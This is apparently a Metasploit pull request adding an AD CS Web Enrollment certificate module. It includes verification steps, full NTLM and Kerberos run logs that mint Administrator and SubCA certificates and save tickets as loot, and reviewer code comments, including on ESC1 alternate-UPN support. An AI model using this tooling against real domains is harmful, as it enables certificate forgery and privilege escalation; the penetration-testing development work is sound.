Skip to content

Add Authenticating Web Enrollment module for AD/CS #20752

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
bwatters-r7 wants to merge 3 commits into
base: master
Choose a base branch
from
Open

Add Authenticating Web Enrollment module for AD/CS #20752

bwatters-r7 wants to merge 3 commits into from
+688 −104

Conversation

@bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Dec 5, 2025

Adds a module to authenticate to Windows AD/CS web enrollment services to query available templates and/or mint certificates based on available templates. It is essentially the same as auxiliary/server/relay/esc8 but we proved the authentication rather than relaying the authentication.

Verification Steps

NTLM

  1. Install and configure the application
  2. Start msfconsole
  3. Do: use auxiliary/admin/http/web_enrollment_cert
  4. Set the RHOSTS option to the AD CS Web Enrollment server
  5. Set the HTTP::Auth option to ntlm
  6. Run the module and wait for a request to be relayed

Kerberos

  1. Install and configure the application
  2. Start msfconsole
  3. Do: use auxiliary/admin/http/web_enrollment_cert
  4. Set the RHOSTS option to the AD CS Web Enrollment server
  5. Set the HTTP::Auth option to kerberos
  6. Set the DOMAIN option to the FQDN
  7. Set the DomainControllerRhost if it is not available through DNS
  8. Run the module and wait for a request to be relayed

Scenarios

NTLM 
msf auxiliary(admin/http/web_enrollment_cert) > show options

Module options (auxiliary/admin/http/web_enrollment_cert):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   MODE       ALL              yes       The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5h,
                                         sapni, socks4, http, socks5
   RHOSTS     10.5.132.180     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /certsrv/        yes       The URI for the cert server.
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


   When MODE is SPECIFIC_TEMPLATE:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CERT_TEMPLATE                   no        The template to issue if MODE is SPECIFIC_TEMPLATE.


View the full module info with the info, or info -d command.

msf auxiliary(admin/http/web_enrollment_cert) > show advanced

Module advanced options (auxiliary/admin/http/web_enrollment_cert):

   Name                     Current Setting                    Required  Description
   ----                     ---------------                    --------  -----------
   DOMAIN                   EXAMPLE                            yes       The domain to use for Windows authentication
   DigestAuthIIS            true                               no        Conform to IIS, should work for most servers. Only set to
                                                                         false for non-IIS servers
   FingerprintCheck         true                               no        Conduct a pre-exploit fingerprint verification
   HTTP::Auth               ntlm                               yes       The Authentication mechanism to use (Accepted: auto, ntlm,
                                                                          kerberos, plaintext, none)
   HttpClientTimeout                                           no        HTTP connection and receive timeout
   HttpPassword             v3Mpassword                        no        The HTTP password to specify for authentication
   HttpRawHeaders                                              no        Path to ERB-templatized raw headers to append to existing
                                                                         headers
   HttpTrace                false                              no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                            no        HTTP request and response colors for HttpTrace (unset to d
                                                                         isable)
   HttpTraceHeadersOnly     false                              no        Show HTTP headers only in HttpTrace
   HttpUsername             Administrator                      no        The HTTP username to specify for authentication
   SSLKeyLogFile                                               no        The SSL key log file
   SSLServerNameIndication                                     no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                               yes       Specify the version of SSL/TLS to be used (Auto, TLS and S
                                                                         SL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3
                                                                         , TLS1, TLS1.1, TLS1.2)
   ShowProgress             true                               yes       Display progress messages during a scan
   ShowProgressPercent      10                                 yes       The interval in percent that progress should be shown
   UserAgent                Mozilla/5.0 (Windows NT 10.0; Win  no        The User-Agent header to use for all requests
                            64; x64) AppleWebKit/537.36 (KHTM
                            L, like Gecko) Chrome/131.0.0.0 S
                            afari/537.36 Edg/131.0.2903.86
   VERBOSE                  true                               no        Enable detailed status messages
   WORKSPACE                                                   no        Specify the workspace for this module


   When HTTP::Auth is kerberos:

   Name                            Current Setting                 Required  Description
   ----                            ---------------                 --------  -----------
   DomainControllerRhost           10.5.132.180                    no        The resolvable rhost for the Domain Controller
   HTTP::Krb5Ccname                                                no        The ccache file to use for kerberos authentication
   HTTP::KrbOfferedEncryptionType  AES256,AES128,RC4-HMAC,DES-CBC  yes       Kerberos encryption types to offer
   s                               -MD5,DES3-CBC-SHA1
   HTTP::Rhostname                 WIN-DRC9HCDIMAT                 no        The rhostname which is required for kerberos - the SPN
   KrbCacheMode                    read-write                      yes       Kerberos ticket cache storage mode (Accepted: none, re
                                                                             ad-only, write-only, read-write)


View the full module info with the info, or info -d command.

msf auxiliary(admin/http/web_enrollment_cert) > run
[*] Checking 10.5.132.180 URL /certsrv/
[*] Retrieving available template list, this may take a few minutes
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
[+] Available Certificates for EXAMPLE\\Administrator on : User, EFS, Administrator, EFSRecovery, ESC16_1, WebServer, SubCA
[*] Creating certificate request for EXAMPLE\\Administrator using the User template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template User and EXAMPLE\\Administrator
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=284&
[+] Certificate for EXAMPLE\\Administrator using template User saved to /home/tmoose/.msf4/loot/20251205150146_default_10.5.132.180_windows.ad.cs_351998.pfx
[*] Creating certificate request for EXAMPLE\\Administrator using the EFS template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template EFS and EXAMPLE\\Administrator
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=285&
[+] Certificate for EXAMPLE\\Administrator using template EFS saved to /home/tmoose/.msf4/loot/20251205150147_default_10.5.132.180_windows.ad.cs_398852.pfx
[*] Creating certificate request for EXAMPLE\\Administrator using the Administrator template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template Administrator and EXAMPLE\\Administrator
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=286&
[+] Certificate for EXAMPLE\\Administrator using template Administrator saved to /home/tmoose/.msf4/loot/20251205150148_default_10.5.132.180_windows.ad.cs_310441.pfx
[*] Creating certificate request for EXAMPLE\\Administrator using the EFSRecovery template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template EFSRecovery and EXAMPLE\\Administrator
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=287&
[+] Certificate for EXAMPLE\\Administrator using template EFSRecovery saved to /home/tmoose/.msf4/loot/20251205150151_default_10.5.132.180_windows.ad.cs_547091.pfx
[*] Creating certificate request for EXAMPLE\\Administrator using the ESC16_1 template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template ESC16_1 and EXAMPLE\\Administrator
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=288&
[+] Certificate for EXAMPLE\\Administrator using template ESC16_1 saved to /home/tmoose/.msf4/loot/20251205150152_default_10.5.132.180_windows.ad.cs_468150.pfx
[*] Creating certificate request for EXAMPLE\\Administrator using the WebServer template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template WebServer and EXAMPLE\\Administrator
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=289&
[+] Certificate for EXAMPLE\\Administrator using template WebServer saved to /home/tmoose/.msf4/loot/20251205150154_default_10.5.132.180_windows.ad.cs_702283.pfx
[*] Creating certificate request for EXAMPLE\\Administrator using the SubCA template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template SubCA and EXAMPLE\\Administrator
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=290&
[+] Certificate for EXAMPLE\\Administrator using template SubCA saved to /home/tmoose/.msf4/loot/20251205150155_default_10.5.132.180_windows.ad.cs_846566.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
Kerberos 
msf auxiliary(admin/http/web_enrollment_cert) > set HTTP::Auth kerberos 
HTTP::Auth => kerberos
msf auxiliary(admin/http/web_enrollment_cert) > set domain example.com
domain => example.com
msf auxiliary(admin/http/web_enrollment_cert) > show options

Module options (auxiliary/admin/http/web_enrollment_cert):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   MODE       ALL              yes       The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5h,
                                         sapni, socks4, http, socks5
   RHOSTS     10.5.132.180     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /certsrv/        yes       The URI for the cert server.
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


   When MODE is SPECIFIC_TEMPLATE:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CERT_TEMPLATE                   no        The template to issue if MODE is SPECIFIC_TEMPLATE.


View the full module info with the info, or info -d command.

msf auxiliary(admin/http/web_enrollment_cert) > show advanced

Module advanced options (auxiliary/admin/http/web_enrollment_cert):

   Name                     Current Setting                    Required  Description
   ----                     ---------------                    --------  -----------
   DOMAIN                   example.com                        yes       The domain to use for Windows authentication
   DigestAuthIIS            true                               no        Conform to IIS, should work for most servers. Only set to
                                                                         false for non-IIS servers
   FingerprintCheck         true                               no        Conduct a pre-exploit fingerprint verification
   HTTP::Auth               kerberos                           yes       The Authentication mechanism to use (Accepted: auto, ntlm,
                                                                          kerberos, plaintext, none)
   HttpClientTimeout                                           no        HTTP connection and receive timeout
   HttpPassword             v3Mpassword                        no        The HTTP password to specify for authentication
   HttpRawHeaders                                              no        Path to ERB-templatized raw headers to append to existing
                                                                         headers
   HttpTrace                false                              no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                            no        HTTP request and response colors for HttpTrace (unset to d
                                                                         isable)
   HttpTraceHeadersOnly     false                              no        Show HTTP headers only in HttpTrace
   HttpUsername             Administrator                      no        The HTTP username to specify for authentication
   SSLKeyLogFile                                               no        The SSL key log file
   SSLServerNameIndication                                     no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                               yes       Specify the version of SSL/TLS to be used (Auto, TLS and S
                                                                         SL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3
                                                                         , TLS1, TLS1.1, TLS1.2)
   ShowProgress             true                               yes       Display progress messages during a scan
   ShowProgressPercent      10                                 yes       The interval in percent that progress should be shown
   UserAgent                Mozilla/5.0 (Windows NT 10.0; Win  no        The User-Agent header to use for all requests
                            64; x64) AppleWebKit/537.36 (KHTM
                            L, like Gecko) Chrome/131.0.0.0 S
                            afari/537.36 Edg/131.0.2903.86
   VERBOSE                  true                               no        Enable detailed status messages
   WORKSPACE                                                   no        Specify the workspace for this module


   When HTTP::Auth is kerberos:

   Name                            Current Setting                 Required  Description
   ----                            ---------------                 --------  -----------
   DomainControllerRhost           10.5.132.180                    no        The resolvable rhost for the Domain Controller
   HTTP::Krb5Ccname                                                no        The ccache file to use for kerberos authentication
   HTTP::KrbOfferedEncryptionType  AES256,AES128,RC4-HMAC,DES-CBC  yes       Kerberos encryption types to offer
   s                               -MD5,DES3-CBC-SHA1
   HTTP::Rhostname                 WIN-DRC9HCDIMAT                 no        The rhostname which is required for kerberos - the SPN
   KrbCacheMode                    read-write                      yes       Kerberos ticket cache storage mode (Accepted: none, re
                                                                             ad-only, write-only, read-write)


View the full module info with the info, or info -d command.

msf auxiliary(admin/http/web_enrollment_cert) > run
[*] Retrieving available template list, this may take a few minutes
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150453_default_10.5.132.180_mit.kerberos.cca_822972.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150454_default_10.5.132.180_mit.kerberos.cca_873951.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
[+] Available Certificates for  on : User, EFS, Administrator, EFSRecovery, ESC16_1, WebServer, SubCA
[*] Creating certificate request for  using the User template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150511_default_10.5.132.180_mit.kerberos.cca_838736.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150512_default_10.5.132.180_mit.kerberos.cca_378054.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template User and 
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=291&
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150513_default_10.5.132.180_mit.kerberos.cca_678953.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150514_default_10.5.132.180_mit.kerberos.cca_501174.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for  using template User saved to /home/tmoose/.msf4/loot/20251205150514_default_10.5.132.180_windows.ad.cs_544884.pfx
[*] Creating certificate request for  using the EFS template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150517_default_10.5.132.180_mit.kerberos.cca_990027.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150518_default_10.5.132.180_mit.kerberos.cca_635605.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template EFS and 
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=292&
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150519_default_10.5.132.180_mit.kerberos.cca_444641.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150519_default_10.5.132.180_mit.kerberos.cca_997726.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for  using template EFS saved to /home/tmoose/.msf4/loot/20251205150520_default_10.5.132.180_windows.ad.cs_057988.pfx
[*] Creating certificate request for  using the Administrator template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150523_default_10.5.132.180_mit.kerberos.cca_612724.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150523_default_10.5.132.180_mit.kerberos.cca_133172.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template Administrator and 
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=293&
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150524_default_10.5.132.180_mit.kerberos.cca_076572.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150525_default_10.5.132.180_mit.kerberos.cca_141364.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for  using template Administrator saved to /home/tmoose/.msf4/loot/20251205150525_default_10.5.132.180_windows.ad.cs_898079.pfx
[*] Creating certificate request for  using the EFSRecovery template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150527_default_10.5.132.180_mit.kerberos.cca_092867.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150528_default_10.5.132.180_mit.kerberos.cca_037432.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template EFSRecovery and 
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=294&
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150529_default_10.5.132.180_mit.kerberos.cca_777681.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150529_default_10.5.132.180_mit.kerberos.cca_507259.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for  using template EFSRecovery saved to /home/tmoose/.msf4/loot/20251205150530_default_10.5.132.180_windows.ad.cs_382790.pfx
[*] Creating certificate request for  using the ESC16_1 template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150532_default_10.5.132.180_mit.kerberos.cca_537546.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150533_default_10.5.132.180_mit.kerberos.cca_539326.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC16_1 and 
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=295&
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150534_default_10.5.132.180_mit.kerberos.cca_276777.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150535_default_10.5.132.180_mit.kerberos.cca_717376.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for  using template ESC16_1 saved to /home/tmoose/.msf4/loot/20251205150535_default_10.5.132.180_windows.ad.cs_525359.pfx
[*] Creating certificate request for  using the WebServer template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150537_default_10.5.132.180_mit.kerberos.cca_267094.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150538_default_10.5.132.180_mit.kerberos.cca_805790.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template WebServer and 
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=296&
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150539_default_10.5.132.180_mit.kerberos.cca_341518.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150540_default_10.5.132.180_mit.kerberos.cca_437824.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for  using template WebServer saved to /home/tmoose/.msf4/loot/20251205150540_default_10.5.132.180_windows.ad.cs_080961.pfx
[*] Creating certificate request for  using the SubCA template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150543_default_10.5.132.180_mit.kerberos.cca_725235.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150544_default_10.5.132.180_mit.kerberos.cca_667357.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template SubCA and 
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=297&
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150545_default_10.5.132.180_mit.kerberos.cca_662646.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20251205150546_default_10.5.132.180_mit.kerberos.cca_344890.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for  using template SubCA saved to /home/tmoose/.msf4/loot/20251205150546_default_10.5.132.180_windows.ad.cs_209545.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >

bwatters-r7
bwatters-r7 commented Dec 5, 2025
View reviewed changes
modules/auxiliary/admin/http/web_enrollment_cert.rb Outdated
super({
'Name' => 'ESC8 Relay: SMB to HTTP(S)',
'Description' => %q{
This module creates an SMB server and then relays the credentials passed to it
Copy link
Contributor Author

@bwatters-r7 bwatters-r7 Dec 5, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ooops...... Copy/pasta.

@smcintyre-r7 smcintyre-r7 self-assigned this Dec 8, 2025
smcintyre-r7
smcintyre-r7 requested changes Dec 8, 2025
View reviewed changes
modules/auxiliary/admin/http/web_enrollment_cert.rb Outdated

register_options(
[
OptEnum.new('MODE', [ true, 'The issue mode.', 'ALL', %w[ALL QUERY_ONLY SPECIFIC_TEMPLATE]]),
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 Dec 8, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

For this module, unlike the relay one, we're highly likely to be able to run it multiple times due to initiating the authentication ourselves. If you set this to default to SPECIFIC_TEMPLATE instead of all, it'd be more closely aligned with the icpr_cert module. Being very similar to that will probably make it easier to drop this in as a replacement for that one when the web service is available but not the ICPR service.

Also is there any way to add support for the additional options that icpr_cert has? If we had the ALT_UPN, ON_BEHALF_OF, PFX, options etc. the user would be able to exploit all of the ESC flaws that they could with that module. IIRC in most cases, the options end up going into the CSR, so there may be an opportunity for more code reuse.

Copy link
Contributor Author

@bwatters-r7 bwatters-r7 Dec 9, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I updated the mode, but still need to look into support for icpr_cert options.
Simply importing the same library and changing the invocation for the CSR is not enough as the library has required options that are no longer required. I'll need to play around further to see what information is required.

@smcintyre-r7 smcintyre-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Dec 8, 2025
@smcintyre-r7 smcintyre-r7 moved this from Todo to Waiting on Contributor in Metasploit Kanban Dec 8, 2025
@bwatters-r7
Copy link
Contributor Author

bwatters-r7 commented Dec 17, 2025

This still needs some work, but I wanted to put the most recent commit up.
I've added the ALT_UPN, ALT_DNS, and ALT_SID, so it now works as another avenue for ESC1, but I still need to bring in on_behalf_of.
Right now, this relies on bringing in the ms_icpr library to make the proper changes to the CSR for the ALT values, but that pulls in a host of other dependencies so there's a lot of deregistering options to make this look right. Once I get the last of the desired functionality up, I'll look at whether it is worth it to move some things out of the ms_icpr library.

jheysel-r7
jheysel-r7 approved these changes Dec 18, 2025
View reviewed changes
lib/msf/core/exploit/remote/http/web_enrollment.rb
include Msf::Exploit::Remote::MsIcpr
def initialize(info = {})
super
deregister_options('CA', 'CERT_TEMPLATE', 'ADD_CERT_APP_POLICY', 'RPORT', 'SMBDomain', 'SMBPassword', 'HttpUsername', 'HttPassword')
Copy link
Contributor

@jheysel-r7 jheysel-r7 Dec 18, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
deregister_options('CA', 'CERT_TEMPLATE', 'ADD_CERT_APP_POLICY', 'RPORT', 'SMBDomain', 'SMBPassword', 'HttpUsername', 'HttPassword')
deregister_options('CA', 'CERT_TEMPLATE', 'ADD_CERT_APP_POLICY', 'RPORT', 'SMBDomain', 'SMBPassword', 'HttpUsername', 'HttpPassword')

lib/msf/core/exploit/remote/http/web_enrollment.rb
Comment on lines +22 to +23
#request = Rex::Proto::X509::Request.create_csr(private_key, cert_template)
#private_key = OpenSSL::PKey::RSA.new(2048)
Copy link
Contributor

@jheysel-r7 jheysel-r7 Dec 18, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
#request = Rex::Proto::X509::Request.create_csr(private_key, cert_template)
#private_key = OpenSSL::PKey::RSA.new(2048)

modules/auxiliary/admin/http/web_enrollment_cert.rb
temp_password = datastore['HttpPassword']
# datastore and options must be nil to fail login so we get ntlm challenge
datastore['HttpUsername'] = nil
datastore['HttpUsername'] = nil
Copy link
Contributor

@jheysel-r7 jheysel-r7 Dec 18, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
datastore['HttpUsername'] = nil
datastore['HttpPassword'] = nil

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 requested changes

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

Requested changes must be addressed to merge this pull request.

Assignees

@smcintyre-r7 smcintyre-r7

Labels

docs module rn-modules release notes for new or majorly enhanced modules

Projects

Metasploit Kanban
Status: Waiting on Contributor

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@bwatters-r7 @jheysel-r7 @smcintyre-r7